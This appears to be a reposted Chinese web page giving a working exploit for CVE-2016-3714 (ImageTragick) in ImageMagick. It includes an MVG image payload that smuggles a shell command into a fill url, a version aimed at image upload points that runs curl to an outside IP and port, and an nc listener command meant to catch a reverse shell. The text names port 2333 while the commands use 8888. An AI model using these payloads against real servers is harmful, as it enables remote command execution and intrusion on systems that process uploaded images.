CVE-2016-3714-ImageMagick 漏洞利用


漏洞簡介:/etc/ImageMagick/delegates.xml 將%s,%l加入到command里造成了命令執行

利用方式:

poc代碼:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| command")'
pop graphic-context

  

圖片上傳點,抓包,附上exp代碼:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context

 

ip:你要反彈的shell地址,2333端口號,服務器監聽反彈shell。

nc -lvp 8888

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM